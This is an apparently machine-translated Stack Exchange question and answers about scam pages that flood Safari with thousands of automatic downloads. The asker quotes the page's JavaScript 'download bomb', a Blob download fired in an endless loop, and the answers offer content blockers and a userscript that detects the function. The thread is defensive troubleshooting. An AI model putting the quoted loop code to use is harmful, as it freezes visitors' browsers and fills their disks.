Safariでのスパムダウンロードを防止する

バックグラウンド

新しいスパムページが、多くの「問題のある」サイト（映画サイトなど）全体に表示されるようになりました。この新しいスパムページは、偽のスキャン、MacKeeper、「YOU HAVE A VIRUS」などのカテゴリに分類されます。

問題

この新しいページの問題は、ポップアップがあるだけでなく、ページが実際にランダムな2kb（ランダムなテキストを含むだけで害はない）ファイルのダウンロードを1msごとに繰り返し開始することです。ウィンドウを閉じる前にダウンロードフォルダがいっぱいになり、1000以上のファイルを削除したままになります。ページスパムが印刷ダイアログを表示する同様の問題とは異なり、対処する時間はほとんどありません。

失敗したトラブルシューティングの試み

• ダウンロードフォルダをロックしてみました。ダウンロードからのダウンロードは阻止されましたが、ダウンロードは可能ですが、ダイアログボックス（画像を参照）が表示されます。通常、このダイアログボックスを閉じるだけで済みますが、約1ミリ秒ごとにダウンロードが試行されるため、閉じるたびに新しいダイアログが表示され、ウィンドウを閉じることができません。

• Safariを強制終了して、ダウンロードを停止します（1kのダウンロード後）が、他のすべてのウィンドウが失われます

• Safari設定で設定を「ダウンロードごとに要求する」に変更します。1k個の個別のダイアログボックスが開いていると、タブを閉じることさえできないため、機能しません。最終的にSafariがクラッシュします。

質問

Safariでスパムダウンロードを防ぐにはどうすればよいですか？

更新：

ダウンロードの原因となったコードを以下に示します（JavaScriptを無効にし、コードを手動で確認することで入手できます）。

 function download(g, h, j) {
                var k = new Blob([g], {
                        type: j
                });
                if (window.navigator.msSaveOrOpenBlob) window.navigator.msSaveOrOpenBlob(k, h);
                else {
                        var l = document.createElement("a"),
                                m = URL.createObjectURL(k);
                        l.href = m, l.download = h, l.click(), setTimeout(function() {}, 0)
                }
        }
        function bomb_ch() {
                var g = Math.random().toString(36).substring(20),
                        h = Math.floor(50 * Math.random() + 25);
                while (true) download(h, g, g)
        }
        function ch_jam() {
                bomb_ch()
        }

注：カスタムページでJSを実行すると問題が発生しました。ダウンロードする代わりにフリーズしました。setInterval()関数を呼び出す関数を使用してダウンロードをエミュレートすることができましたdownload。

詳細：https : //blog.malwarebytes.com/malwarebytes-news/2018/02/tech-support-scammers-find-new-way-jam-google-chrome/

これは、選択的なSafariコンテンツブロッカー/ JavaScriptブロッカーの良いケースではないでしょうか？

Ghosteryは、事前に構築されたルールを使用して、クロスサイトスクリプティング/ Webページへのコードの広告挿入を無効にすることができるかどうかを確認するために、Macから始めるのに適した場所です。もちろん、ページがそのコンテンツを直接提供している場合は、そのページのJavaScriptを完全に無効にするか、注意を払って、意図的に、または広告インジェクションを誰かに売却することにより、エクスペリエンスを破壊しているサイトをブロックする必要があります。この恐怖の製品と詐欺の製品を購入してください。

より正確にしたい場合-GreaseMonkeyタイプのユーザースクリプトは、十分なJS知識でこれに対抗できます（または、このマルウェアの今日の反復をブロックするスクリプトを書いた人を見つけることができます）。

• https://tampermonkey.net/?browser=safari
• https://www.greasespot.net

@JBisによる編集

次のユーザースクリプトはページのブロックに成功しました。

     // ==UserScript==
     // @name         The Bomb Squad
     // @version      0.1
     // @description  Blocks the pages containing any function with the bomb_ch function detailed in /apple/329594/prevent-spam-downloads-on-safari and https://blog.malwarebytes.com/malwarebytes-news/2018/02/tech-support-scammers-find-new-way-jam-google-chrome/
     // @author       Josh Brown (@JBis https://apple.stackexchange.com/users/263848/jbis)
     // @match        *
     // @grant        none

    // ==/UserScript==

   if (typeof bomb_ch === "function") {
     document.getElementsByTagName("body")[0].innerHTML="<h1>Page Defused by The Bomb Squad</h1><p>Because it contatained the following
 function(s):  <pre>bomb_ch()</pre> <br>";
    }

注： Sp（c）ammerは、bomb_ch()関数をランダム化することでこれを簡単にバイパスできます。

Safariの新しいOSバージョンはこれを少し減らすのに役立つかもしれませんが、Macにこのがらくたの負荷を提供する人々が稼ぐお金があるので、彼らはブロックを簡単にしようとするあらゆるテクノロジーに適応するでしょう。「もぐらたたき」ができ、シャルラタンがボイラールームで新しいコードを作り上げるよりも速く適応できる設定のライブラリを維持しているビジネスをサポートするために、より多くのお金を費やしたいと思わない限り。

また、これを行うWebサイトが詐欺の一部であるシャーラタンであるかどうかも判断する必要があります。

Safariには多くの有効な広告ブロッカーがありますが、より広いスペクトルの拡張機能ベースのコンテンツブロッカーの選択肢ははるかに少なくなります。これらのうち、2つだけが目立ちます：GhosteryとuBlockOrigin [ 情報リンク： https : //github.com/gorhill/uBlock ダウンロードリンク： https : //safari-extensions.apple.com/?q=ublock%20origin 。

編集： uBlock Originを、よく似た名前のuBlockと混同しないでください。2つの製品は、能力と評判が大幅に異なります。

彼らはあなたが望むことをして、ダウンロードがあなたの友人を爆撃するのを防ぎますか？はい、GhosteryにはuBlockOriginがデフォルトとして実行するように設定されているいくつかのルールのカスタマイズが必要であるという違いがあります。

uBlockOriginが、「詳細」リンクのMalwarebytes発表の1か月前にこの特定のエクスプロイトをブロックしたことを知っています。Ghosteryのタイムラインについては知りません。

両方試してみることをお勧めします。